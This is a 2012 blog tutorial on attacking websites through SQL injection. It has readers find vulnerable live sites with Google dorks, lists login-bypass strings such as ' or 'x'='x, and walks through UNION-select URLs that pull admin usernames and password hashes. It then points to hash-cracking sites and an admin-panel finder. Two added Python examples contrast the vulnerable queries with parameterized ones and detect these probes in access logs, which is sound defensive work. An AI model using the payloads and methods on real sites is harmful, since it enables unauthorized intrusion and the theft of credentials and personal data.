Wednesday, 9 May 2012

Basic SQL Injection Tutorial

What is SQL injection?
SQL injection is used to exploit a website and extract data from its database. Using SQL injection an attacker can extract data such as admin login information, credit card details, emails, phone numbers, addresses, names, etc.
SQL - Structured Query Language
SQL is a language used to communicate with and manage databases.
If this doesn't satisfy your curiosity then here's a link to Wikipedia.

Let's start with the real stuff!


Finding Vulnerable Website Using Dorks
Dorks list -- by SideSwipe.
Just copy one dork, e.g. inurl:index.php?id=, and Google it.



Gaining Access to Administrator Account Using Queries
Search for inurl:admin.php using Google. Choose any of the sites listed in the Google search results.
Use ' or 'x'='x in both the admin (username) and password boxes.
Username: ' or 'x'='x
Password: ' or 'x'='x
 

You can also try the following queries:
') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

Normal/UNION Based SQL Injection 
Checking Vulnerability
Target: 
http://www.targetsite.com/pages.php?id=2 
Add ' (an apostrophe) at the end of the link:
http://www.targetsite.com/pages.php?id=2'  
The following error will occur:
You have an error in your SQL syntax;check the manual corresponds to your MySQL server version  for the right syntax to use near '\" at line 1
If the website loads as it did before, without an error, then it is not vulnerable to this kind of SQL injection. If it gives an error we can move further; otherwise select another website.

Finding Number Of Columns
http://www.targetsite.com/pages.php?id=2+order+by+1--  NO ERROR
http://www.targetsite.com/pages.php?id=2+order+by+2--  NO ERROR
http://www.targetsite.com/pages.php?id=2+order+by+3--  NO ERROR
http://www.targetsite.com/pages.php?id=2+order+by+4--  NO ERROR
http://www.targetsite.com/pages.php?id=2+order+by+5--  NO ERROR
Keep increasing the number till we get an error.
Don't forget to add -- (two hyphens) at the end of the link.

http://www.targetsite.com/pages.php?id=2+order+by+15--  ERROR
Finally we get an error at order+by+15--. It means that the query returns 14 columns.

Determining Vulnerable Columns
http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--   
OR
http://www.targetsite.com/pages.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--  
Don't forget to add - (a hyphen) after id= . If you are using id=null+union+select... then there is no need to add the hyphen after id=.
The page will display the numbers of the columns whose values are echoed into the page; here column number 4 is displayed, so column 4 is the vulnerable (echoed) one.
We will use the vulnerable column to extract data from the website.

Determining Mysql Version
It is easy to find the MySQL version. Replace the vulnerable column with
@@version 
OR
version() 
We found column number 4 vulnerable, so we replace column number 4 with @@version.
http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14-- 
We got the MySQL version:
5.1.61-community-log
If you got a MySQL version less than 5 then you have to use error-based SQL injection. I am not going to explain error-based SQL injection, so leave that website and choose another. Let's move further.

Finding Database
http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14+from+information_schema.schemata--

information_schema contains metadata. Metadata is data about other data, such as the names of tables and columns.
information_schema.schemata contains the names of all databases.
We got the database names information_schema and site_target.

Finding Tables
http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14+
from+information_schema.tables+where+table_schema=database()--
  
This will display the tables.
They are not displayed in a readable manner; we need to separate them so we can read them clearly.
Just add 0x0a after table_name.
0x0a is the hex value of a newline character.

http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(table_name,0x0a),5,6,7,8,9,10,11,12,13,14+
from+information_schema.tables+where+table_schema=database()-- 
Don't forget to add a , (comma) between table_name and 0x0a.

We got the following tables:
tblgroup
,tblimages
,tblmaincategory
,tbloption
,tbloptionname
,tblorderdetails
,tblorders
,tblpage
,tblpagename
,tblpics
,tblproducts
,tblrelated
,tblsitemap
,tblstate
,tblsubcategory
,tbltemp
,tbltempoption
,tbltempoptionname
,tbltemppics
,tblusers
Our goal is to get the admin username and password, so we are going to extract the columns from tblusers.
 
Finding Columns
www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(column_name,0x0a),5,6,7,8,9,10,11,12,13,14+
from+information_schema.columns+where+table_name=char(116,98,108,117,115,101,114,115)--
We need to convert the table name into its ASCII values: tblusers is char(116,98,108,117,115,101,114,115).
String - ASCII, HEX, Binary Converter
We got the columns from tblusers:

UserId,UserName,UserPwd  
 
Extracting Data From Columns
http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(UserId,0x3a,UserName,0x3a,UserPwd,0x0a),5,6,7,8,9,10,11,12,13,14+from+tblusers--
Here 0x3a separates UserId, UserName and UserPwd from each other; 0x3a is the hex value of : (colon).

3:samplehash:1b4ea4c5cc5181229340c1c188baad6f
,4:samplehash:27b811b22de87faa7925ae3c2a0337fe
,19:samplehash:416947dc3ddd5871659ee142273ffa95
:0,20:samplehash:043d9d7cd5afa18257b77164bc91205e
Finally we got the usernames and passwords.
The passwords are not in plain text; they are stored as hashes, so we need to crack them.
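The whole chain above works only because pages.php pastes the id parameter straight into its SQL string, and the admin-bypass trick from the start of the tutorial works because the login page does the same with the username and password. This added example (not from the original tutorial) reproduces both vulnerable queries next to their parameterized forms. It assumes an in-memory SQLite database with constructed tblpage/tblusers rows standing in for the tutorial's MySQL site, so the information_schema steps are not reproduced.

```python
import sqlite3

# Constructed sample schema and rows standing in for the tutorial's pages.php
# lookup and tblusers table (SQLite in memory, made-up values).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tblpage (id INTEGER, title TEXT, body TEXT, author TEXT)")
    con.execute("INSERT INTO tblpage VALUES (2, 'About', 'About us', 'editor')")
    con.execute("CREATE TABLE tblusers (UserId INTEGER, UserName TEXT, UserPwd TEXT)")
    con.execute("INSERT INTO tblusers VALUES (3, 'admin', 'constructed-hash-value')")
    return con

def vulnerable_login(con, user, pwd):
    # Concatenated login check: a quote in the input ends the string literal, so
    # ' or 'x'='x turns the WHERE clause into a tautology and matches every row.
    sql = ("SELECT UserId FROM tblusers WHERE UserName='" + user
           + "' AND UserPwd='" + pwd + "'")
    return con.execute(sql).fetchall()

def safe_login(con, user, pwd):
    # Same check with bound parameters: the quotes stay inside the value.
    sql = "SELECT UserId FROM tblusers WHERE UserName=? AND UserPwd=?"
    return con.execute(sql, (user, pwd)).fetchall()

def vulnerable_page(con, page_id):
    # The pattern behind pages.php?id=: id=-2 union select ... appends the
    # attacker's SELECT, so the echoed row can come from any table.
    sql = "SELECT id, title, body, author FROM tblpage WHERE id=" + page_id
    return con.execute(sql).fetchall()

def safe_page(con, page_id):
    # Bound parameter: the whole string is compared as one value and matches nothing.
    sql = "SELECT id, title, body, author FROM tblpage WHERE id=?"
    return con.execute(sql, (page_id,)).fetchall()

if __name__ == "__main__":
    con = make_db()
    bypass = "' or 'x'='x"
    probe = "-2 union select UserId,UserName,UserPwd,4 from tblusers--"
    print(vulnerable_login(con, bypass, bypass), safe_login(con, bypass, bypass))
    print(vulnerable_page(con, probe), safe_page(con, probe))
```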

Admin Login Page:
http://www.targetsite.com/admin/index.php

Cracking Hashes
·  http://www.md5decrypter.co.uk
·  http://www.md5crack.com/


Finding Admin Login Page
Online Admin login panel finder
Perl Script
Requirements:
Download ActivePerl and install
Admins.pl
Open CMD and navigate to admins.pl, or simply double-click on the admins.pl file.
Now enter the name of your targeted site and press Enter,
e.g. http://www.targetsite.com
Type the coding language of the website, such as php or asp. If you don't know the language then type any and press Enter. It will begin scanning for the admin control panel.
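Both the UNION probing in this tutorial and an admin-panel finder leave a recognizable trail in the web server's access log. This added example (not part of the original tutorial) flags that trail in constructed sample log lines; the IPs, paths, indicator regexes and the 404 threshold are assumptions, and the login-bypass payload is only visible here because the constructed form submits via GET.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined format) mimicking the requests this
# tutorial produces; the IPs and paths are made up for the example.
SAMPLE_LOG = """\
203.0.113.5 - - [09/May/2012:10:00:01 +0000] "GET /pages.php?id=2 HTTP/1.1" 200 5120
203.0.113.5 - - [09/May/2012:10:00:09 +0000] "GET /pages.php?id=2+order+by+15-- HTTP/1.1" 200 812
203.0.113.5 - - [09/May/2012:10:00:20 +0000] "GET /pages.php?id=-2+union+select+1,2,3,@@version,5-- HTTP/1.1" 200 5200
203.0.113.5 - - [09/May/2012:10:00:31 +0000] "GET /pages.php?id=-2+union+select+1,2,3,group_concat(table_name),5+from+information_schema.tables-- HTTP/1.1" 200 5300
203.0.113.5 - - [09/May/2012:10:01:00 +0000] "GET /admin/login.php HTTP/1.1" 404 210
203.0.113.5 - - [09/May/2012:10:01:01 +0000] "GET /administrator/ HTTP/1.1" 404 210
203.0.113.5 - - [09/May/2012:10:01:05 +0000] "GET /admin/index.php?user=%27+or+%27x%27%3D%27x&pass=%27+or+%27x%27%3D%27x HTTP/1.1" 200 1800
198.51.100.7 - - [09/May/2012:10:02:00 +0000] "GET /pages.php?id=3 HTTP/1.1" 200 5100
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3}) ')

# Indicator regexes run against the URL-decoded request target, case-insensitively.
INDICATORS = {
    "order_by_probe": r"\border\s+by\s+\d+",
    "union_select": r"\bunion\s+(?:all\s+)?select\b",
    "schema_enum": r"\binformation_schema\b|@@version|\bversion\(\)|\bgroup_concat\(",
    "tautology": r"\bor\s+'?(\w+)'?\s*=\s*'?\1\b",   # ' or 'x'='x, or 1=1
}

def analyse(log_text, scan_threshold=2):
    """Return {ip: sorted indicator names} for every IP that tripped something."""
    hits, admin_404s = {}, {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        decoded = unquote_plus(target)  # id=2+order+by+15 -> id=2 order by 15
        for name, pattern in INDICATORS.items():
            if re.search(pattern, decoded, re.IGNORECASE):
                hits.setdefault(ip, set()).add(name)
        # Admin-panel finders leave a run of 404s on admin-looking paths.
        if status == "404" and "admin" in decoded.lower():
            admin_404s[ip] = admin_404s.get(ip, 0) + 1
    for ip, n in admin_404s.items():
        if n >= scan_threshold:
            hits.setdefault(ip, set()).add("admin_panel_scan")
    return {ip: sorted(names) for ip, names in hits.items()}

if __name__ == "__main__":
    for ip, names in analyse(SAMPLE_LOG).items():
        print(ip, names)
```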
 
Thank you for reading the tutorial.
Please post comments and let me know how the tutorial was. This TUT is the result of my friend's hard work and credit goes to Mst. Suved.